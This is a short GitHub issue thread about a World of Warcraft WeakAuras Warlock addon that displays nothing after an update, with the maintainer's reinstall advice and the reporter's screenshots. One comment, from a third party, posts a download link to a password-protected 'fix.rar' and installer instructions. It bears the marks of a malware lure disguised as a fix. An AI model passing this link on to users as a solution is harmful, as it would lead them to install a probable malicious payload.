### ISSUE TITLE
Warlock Nag non existant.

### ISSUE THREAD

**Issue by Tresju** [Rakizi/NAG-issues#5]
WA does not show anything after update, old one does not work either now.

Simple as that :P

**Comment by Rakizi** [comment]
make sure you delete old of both and install latest

**Comment by Rakizi** [comment]
![image](https://github.com/user-attachments/assets/10760b11-fbeb-496f-8fb0-d8e88bb8c562)

**Comment by Tresju** [comment]
gotta look into that ..i just dont get it up.. one moment

**Comment by Tresju** [comment]
![image](https://github.com/user-attachments/assets/4503765b-4fc2-4809-a347-9d48a3a5eb6f)

**Comment by Tresju** [comment]
if i compare my warlock one with my paladin/dk one the WL is tiny..in size etc..idk what im doing wrong lol

**Comment by Tresju** [comment]
![image](https://github.com/user-attachments/assets/c132b8ad-ea2e-4e3a-bd41-842218f973ad)

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Rakizi** [comment]
i can't click on them to zoom in to see whats going on really from the pic?

**Comment by Rakizi** [comment]
If this is still an issue, please reopen and/or msg myself or fonsas and we can figure out the issues with ya.
